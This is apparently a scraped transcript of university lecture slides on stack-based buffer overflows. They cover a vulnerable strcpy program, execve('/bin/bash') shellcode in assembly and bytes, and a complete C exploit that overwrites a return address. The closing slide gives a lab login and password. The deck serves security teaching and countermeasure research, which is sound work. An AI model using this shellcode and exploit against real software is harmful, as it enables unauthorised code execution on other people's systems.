1 / 19

Stack-based buffer overflows

Stack-based buffer overflows. Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be. Overview. Introduction Buffer overflows Stack-based buffer overflows Shellcode Code injection Conclusion. Introduction.

natane
Download Presentation

Stack-based buffer overflows

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be

  2. Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  3. Introduction • Buffer overflows: write outside the boundaries of an array • Can be used to overwrite adjacent memory • The stack contains control-flow related data, e.g. return addresses • Overwriting this data allows an attacker to execute new or existing code Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  4. Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  5. Buffer overflows (on IA32) • int main(int argc, char **argv) { int a; char buf[100]; strcpy(buf, argv); } • Int a is allocated on the stack: 4 bytes • Buf has memory allocated for 100 chars: 100 bytes • Argv could be larger than that, allowing an attacker to overwrite a in this example Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  6. Buffer overflow on IA32 High addr int a char buf[100] Low addr Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  7. Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  8. Stack based buffer overflows • void f1(char *a) { char buffer[100]; strcpy(buffer, a); } • void f0(char *b) { f1(b); } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  9. Stack-based buffer overflows Stack High addr f0: Return address f0 … Saved Frame Ptr f0 Stack frame f0 call f1 Local variables f0 … Arguments f1 f1: buffer[] Return address f1 overflow() … Saved Frame Ptr f1 Stack frame f1 Injected code Buffer Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  10. Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  11. Shellcode • Code to execute once the return address has been overwritten • Usually inserted into buffer that is used to overflow • Some subtleties: a NULL will terminate an strcpy, \n will terminate gets Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  12. Example code • #include <unistd.h> int main() { char *argv[2]; argv[0] = "/bin/bash"; argv[1] = 0; execve(argv[0], argv, 0); } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  13. Example transformed to assembly • .type main,@function main: push $0x68 # Place h on the stack. push $0x7361622f # Place sab/ on the stack. push $0x6e69622f # Place nib/ on the stack. mov %esp,%ebx # Copy the pointer to /bin/bash to ebx. xor %edx,%edx # Empty edx. push %edx # Place a NULL on the stack to terminate the argv. push %ebx # Place the pointer to /bin/bash on the stack. mov %esp,%ecx # Copy the pointer to the pointer to /bin/bash into ecx. mov $0xb,%eax # Let the syscall know we want execve int $0x80 # Do the system call Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  14. Shellcode • (gdb) x/27b main • 0x8048308 <main>: 0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68 • 0x8048310 <main+8>: 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2 • 0x8048318 <main+16>: 0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00 • 0x8048320 <main+24>: 0x00 0xcd 0x80 Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  15. Shellcode • .globl main .type main,@function main: push $0x68 push $0x7361622f push $0x6e69622f mov %esp,%ebx xor %edx,%edx push %edx push %ebx mov %esp,%ecx xor %eax,%eax # set %eax to 0 mov $0xb,%al # copy 0xb into %al (least signicant byte of %eax) int $0x80 Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  16. Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  17. Sample vulnerable program • void function(inta, char *b) { charstring1[10]; charstring2[50]; strcpy(string2,b); } intmain(intargc, char **argv) { function(1,argv[1]); } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  18. Sample exploit • #include <stdio.h> #include <stdlib.h> char shellcode[] = "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89" "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"; #define ADDR 0xbffffe2c int main() { char overflow[72]; char *argv[3] = { "./bufferoverflow", overflow, NULL }; memset(overflow,'\x90',72); // fill with NOPs *(long *) &overflow[68] = ADDR; // replace ret. addr. memcpy(overflow, shellcode, strlen(shellcode)); execve(argv[0],argv,0); // exex program } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  19. Conclusion • Follow “Gera’s Insecure Programming by example”: • http://community.corest.com/~gera/InsecureProgramming/ • Login/pass for the computers: cstudy/distrinet Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

More Related